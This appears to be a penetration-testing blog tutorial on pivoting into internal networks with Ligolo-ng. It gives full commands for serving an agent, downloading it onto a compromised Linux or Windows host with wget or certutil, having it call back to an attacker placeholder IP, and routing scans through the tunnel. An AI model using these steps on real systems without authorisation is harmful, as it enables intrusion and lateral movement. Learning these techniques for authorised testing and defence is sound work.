Unlock Hidden Networks: Tunneling and Pivoting

Hello folks,

Ever get that initial shell on a target, see another network segment you can't reach, and dread the hassle of setting up a pivot? What if I told you there's a better way?

Before discovering Ligolo-ng, I used proxychains for pivoting. While useful for application-level SOCKS tunneling, it has big limitations:

• Doesn’t work with many tools
• Only supports tools that are dynamically linked
• Protocol restrictions

Ligolo-ng changes everything. It creates a virtual network interface that lets you pivot natively through a compromised machine—your whole toolkit works as if you're *inside* the new network.

What You Need to Know

• Agent – Runs on the compromised host
• Proxy – Runs on your attacker machine
• Tunnel – Secure connection between proxy and agent

Step 1: Download and Setup

1. Download the Tools from Ligolo-ng:

• Proxy → attacker machine
• Agent → target machine (Linux or Windows)

2. Prepare Your Attacker Machine

mkdir /opt/ligolo
cd /opt/ligolo

# Download or transfer files
tar -xvf ligolo-proxy.tar.gz
tar -xvf ligolo-agent.tar.gz

# Rename for convenience
mv proxy lin-proxy
mv agent lin-agent
  

Step 2: Start the Ligolo-ng Server (Proxy)

Create a virtual TUN interface on your attacker machine:

sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
  

Now start the proxy listener:

./lin-proxy -selfcert -laddr 0.0.0.0:443
  

The -selfcert flag generates a temporary certificate automatically.

Step 3: Deploying the First Agent (Linux Target)

1. Transfer the Agent

sudo python3 -m http.server 80  # On attacker

wget http://<YOUR-IP>/lin-agent   # On target
chmod +x lin-agent
  

2. Run the Agent

./lin-agent -connect <YOUR-IP>:443 -ignore-cert
  

Back on the proxy, you should see a new session appear. Activate it using:

session
start
  

Step 4: Discover Networks and Pivot

On the compromised machine, enumerate routes:

ip route
netstat -an
ifconfig
  

If you discover a network like 192.168.110.0/24, add it to your attacker machine:

sudo ip route add 192.168.110.0/24 dev ligolo
  

Now scan hosts as if you're in that network:

nmap -sV 192.168.110.50
  

Step 5: Pivoting Into a Windows Host

On the Windows target, discover new networks:

netstat -an | findstr "192.168."
  

Transfer the Windows agent:

certutil.exe -urlcache -split -f "http://<YOUR-IP>/win-agent.exe"
  

Run it:

win-agent.exe -connect <YOUR-IP>:443 -ignore-cert
  

Add the new route (e.g., 192.168.210.0/24):

sudo ip route add 192.168.210.0/24 dev ligolo
  

Summary

• Setup proxy + agents
• Start the Ligolo-ng proxy
• Run agent on compromised host
• Find internal networks
• Add routes through Ligolo
• Repeat when pivoting deeper

That's all I got for now!!
Regards, dr3amy